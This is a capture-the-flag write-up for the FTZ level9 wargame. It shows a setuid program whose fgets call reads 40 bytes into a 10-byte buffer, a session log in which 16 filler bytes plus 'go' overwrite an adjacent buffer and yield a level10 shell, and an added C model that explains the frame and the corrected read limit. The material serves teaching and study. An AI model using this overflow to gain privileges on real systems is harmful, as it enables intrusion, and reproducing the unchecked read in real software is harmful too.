[FTZ] level9 Solution

💡 FTZ level9 Solution

Problem

Account: level9/apple

hint

The following is the source of /usr/bin/bof.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(){

  char buf2[10];
  char buf[10];

  printf("It can be overflow : ");
  fgets(buf,40,stdin);

  if ( strncmp(buf2, "go", 2) == 0 )
   {
        printf("Good Skill!\n");
        setreuid( 3010, 3010 );
        system("/bin/bash");
   }

}

Use this to gain level10's privileges.

Solution

Using the buffer overflow, the data written to buf has to overwrite buf2.

First, check how many bytes buf2 and buf have each been allocated.

When I try to run gdb, I get permission denied.

There are only a few candidates, so I just brute-force it.

Because data is allocated in 4-byte units, I try 12, 16, 20, ... in turn.

As shown below, after overwriting with 16 A's I was able to get a shell.

[level9@ftz level9]$ /usr/bin/bof
It can be overflow : AAAAAAAAAAAAgo
[level9@ftz level9]$ /usr/bin/bof
It can be overflow : AAAAAAAAAAAAAAAAgo
Good Skill!
[level10@ftz level9]$ id
uid=3010(level10) gid=3009(level9) groups=3009(level9)
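Why 16 filler bytes reach the check and 12 do not, and what the corrected read limit changes, as an added example that is not part of the original write-up. It uses a constructed model of the frame: `struct frame`, `read_line` and `branch_taken` are hypothetical names, the 16-byte distance from buf to buf2 is inferred from the session above, and the padding sizes are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of main()'s frame. The 16-byte distance from buf to buf2
 * is inferred from the session above (12 A's fail, 16 succeed); the padding
 * and the 14 trailing bytes are assumptions that keep a 40-byte write inside
 * the model. */
struct frame {
    char buf[10];
    char pad[6];
    char buf2[10];
    char above[14];
};

/* fgets()-like read from a string: stores at most limit-1 bytes, stops after
 * a newline, always NUL-terminates. The destination is the frame viewed as
 * raw bytes, so writing past buf is well defined in this model. */
static void read_line(struct frame *f, size_t limit, const char *input)
{
    unsigned char *dst = (unsigned char *)f;
    size_t i = 0;

    if (limit > sizeof *f)
        limit = sizeof *f;              /* never leave the model */
    while (i + 1 < limit && input[i] != '\0') {
        dst[i] = (unsigned char)input[i];
        if (input[i++] == '\n')
            break;
    }
    dst[i] = '\0';
}

/* Returns 1 when the strncmp(buf2, "go", 2) check would pass. */
int branch_taken(const char *input, size_t limit)
{
    struct frame f;

    /* Zeroed so the result depends only on the input; the original program
     * never initialises buf2 before comparing it. */
    memset(&f, 0, sizeof f);
    read_line(&f, limit, input);
    return strncmp(f.buf2, "go", 2) == 0;
}

int main(void)
{
    const char *in = "AAAAAAAAAAAAAAAAgo\n";    /* input from the session */
    printf("limit 40 (as shipped): %d, limit 10 (sizeof buf): %d\n",
           branch_taken(in, 40), branch_taken(in, 10));
    return 0;
}
```

With the limit set to the size of buf, as in `fgets(buf, sizeof buf, stdin)`, the same input is truncated before it reaches buf2 and the check fails.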
